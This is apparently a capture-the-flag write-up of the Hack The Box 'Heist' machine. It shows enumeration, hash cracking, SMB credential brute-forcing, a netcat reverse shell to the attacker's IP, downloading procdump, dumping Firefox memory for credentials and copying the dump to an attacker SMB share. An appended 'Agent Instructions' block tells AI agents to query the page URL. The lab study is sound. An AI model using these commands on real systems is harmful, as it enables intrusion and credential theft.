# HTB - Heist
## Enumeration
***
**Scope**
> IP Address: 10.10.10.149
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p1-10000 $ip -Pn -n --disable-arp-ping -vv --min-rate 10000
PORT STATE SERVICE REASON
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p80,135,445,5985 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-06T23:55:49
|_ start_date: N/A
```
```
* Open ports: 80 - 135 - 445 - 5985
* UDP Open ports: None
* Services: HTTP - RPC - SMB - winRM
* Versions:IIS httpd 10.0
```
**SMB**
```BASH
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\: STATUS_ACCESS_DENIED
```
We can see that SMB enumeration failed, switching to RPC, but also failed
**RPC**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
```
**HTTP**
web page at `http://10.10.10.149/login.php`
I tried to supply default credentials, but the `login` button didn't send any request to the backend server, However `Login as guest` took my attention and click it
It took me to `http://10.10.10.149/issues.php` as shown above.
From this page I could extract some useful information:
```
usernames: Hazard, Support Admin
Attachment: http://10.10.10.149/attachments/config.txt
```
`http://10.10.10.149/attachments/config.txt`
If you configured Cisco router before, you would be familiar with this syntax and commands. We can extract additional information:
```
username: rout3r, admin
password hashes:
0242114B0E143F015F5D1E161713
02375012182C1A1D751618034F36415408
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
```
My plan was to create a list of usernames and passwords after cracking it and brute forcing SMB protocol.
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat users.list
Hazard
"support Admin"
rout3r
admin
```
I had to know the hash type to be able to crack it
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ hashid -m '$1$pdQG$o8nrSzsGXeaduXrjlvKc91'
[+] MD5 Crypt [Hashcat Mode: 500]
[+] Cisco-IOS(MD5) [Hashcat Mode: 500]
[+] FreeBSD MD5 [Hashcat Mode: 500]
```
Sense this hash is obtained from router configuration, the hash type should be `Cisco-IOS(MD5)`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ hashcat -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' /usr/share/wordlists/rockyou.txt
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
Session..........: hashcat
Status...........: Cracked
```
The command `username password 7 ` reveals that the encryption type is `7` which I can search about
I got a tool that can decrypt type-7 hash:
{% embed url="" %}
Now, I'm going to create a passwords list and then brute force SMB
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat passwords.list
stealth1agent
Q4)sJu\Y8qz*A3?d
$uperP@ssword
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u users.list -p passwords.list --continue-on-success
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
```
I tried to enumerate SMB with the credentials I've found but nothing interesting found
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u Hazard -p 'stealth1agent' --shares
SMB 10.10.10.149 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.10.10.149 445 SUPPORTDESK C$ Default share
SMB 10.10.10.149 445 SUPPORTDESK IPC$ READ Remote IPC
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ smbclient -U Hazard \\\\$ip\\IPC$
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
```
No options available now for me except enumerating RPC with hazard credentials. I tried several commands to enumerate the machine but these only two worked
```bash
rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
```
So, the domain SID is `S-1-5-21-4254423774-1266059056-3197185112` and RID is added to the end I wanted to enumerate users on the machine but `enumdomuers` failed, however `lookupnames` & `lookupsids` can be used for that purpose.
* The user SID contain two parts:
* SID of the domain
* RID of the user
I knew from previous experience that RID count starts with `500` which is the administrator RID and regular users start for `1000,` So I will generate a wordlist `{500:510}` for admins accounts & `{1000:1100}` for regular users.
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for rid in {500..510};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids.txt;done
for rid in {1000..1100};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids1.txt;done
```
Loop with the two wordlists and redirect the output to `results.txt` and then read the files
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for sid in $(cat sids.txt);do rpcclient -U "Hazard%stealth1agent" $ip -c "lookupsids $sid" >> results.txt;done
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for sid in $(cat sids1.txt);do rpcclient -U "Hazard%stealth1agent" $ip -c "lookupsids $sid" >> results.txt;done
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat results.txt | grep -v unknown
S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\Administrator (1)
S-1-5-21-4254423774-1266059056-3197185112-501 SUPPORTDESK\Guest (1)
S-1-5-21-4254423774-1266059056-3197185112-503 SUPPORTDESK\DefaultAccount (1)
S-1-5-21-4254423774-1266059056-3197185112-504 SUPPORTDESK\WDAGUtilityAccount (1)
S-1-5-21-4254423774-1266059056-3197185112-513 SUPPORTDESK\None (2)
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)
```
## Initial Access
***
I created a wordlist for newly-discovered users and then bruted force the SMB again
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat users.lst
Hazard
support
Chase
Jason
```
We got a hit :)
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u users.lst -p passwords.list
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qxxxxxx
```
I will try now to test winrm connection with `crackmapexec` to see if we can login with user `Chase`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec winrm $ip -u Chase -p 'Q4)sJu\Y8qxxxxxxx'
WINRM 10.10.10.149 5985 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qxxxxxxx (Pwn3d!)
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ evil-winrm -i $ip -u Chase -p 'Q4)sJu\Y8qxxxxxxx'
*Evil-WinRM* PS C:\Users\Chase\Documents>
*Evil-WinRM* PS C:\Users\Chase> type Desktop\user.txt
7ec14ed02a46043fc7c55xxxxxxxxxxxxxxxx
```
> User Flag: 7ec14ed02a46043fc7cxxxxxxxxxxxxx
***
## Privilege Escalation
`evil-winrm` is too slow, So I will upload `nc` and get a shell instead of it
```bash
*Evil-WinRM* PS C:\Tools> upload nc.exe
*Evil-WinRM* PS C:\Tools> .\nc.exe 10.10.16.25 443 -e PowerShell
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.149] 49716
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Tools>
```
I didn't find many interesting things since I landed as `Chase`, So I run `Winpeas.exe` and it highlighted these files as read:
```hash
C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\cert9.db
```
Unfortunately, after I extracted the secrets from these files, it didn't reveal anything useful.
Next, I got a hint from community to change my mind and dump Firefox process from memory, Let's see how I did it.
I uploaded `procdump.exe` from `Sysinternals suite`, got the process-ID of `Firefox` and began to dump it
```bash
PS C:\Tools> curl 10.10.16.25/procdump.exe -o .\p.exe
PS C:\Tools> Get-Process -name firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
347 19 10236 35660 0.11 4136 1 firefox
1089 72 151396 228756 4.92 6036 1 firefox
401 33 32148 90740 0.59 6280 1 firefox
378 28 22600 59420 0.38 6484 1 firefox
355 25 16464 38936 0.13 6764 1 firefox
```
```bash
PS C:\Tools> .\p.exe -accepteula -ma 6764
[08:04:29] Dump 1 initiated: C:\Tools\firefox.exe_240707_080429.dmp
[08:04:29] Dump 1 writing: Estimated dump file size is 298 MB.
```
Start `smbserver` and copy the dump to my attack host
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ impacket-smbserver -smb2support share .
PS C:\Tools> copy firefox.exe_240707_080429.dmp \\10.10.16.25\share
```
The `dmp` file is a binary file, So using `grep` will work only with `strings` command
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ strings firefox.exe_240707_080429.dmp | grep "administrator\|password"
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8xxxxx&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]xxxxx&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8xxxxx&login=
```
The Credentials found:
```
admin@support.htb:4dD!5}x/re8]xxxxxx
```
I will try to test these creds with `crackmapexec`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u administrator -p '4dD!5}x/re8]xxxxxx'
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
```
And we gained administrator account :)
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ impacket-psexec supportdesk/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
906f0e1ac412590d0bdc50xxxxxxxxxx
```
> Root Flag: 906f0e1ac412590d0xxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/easy/htb-heist.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.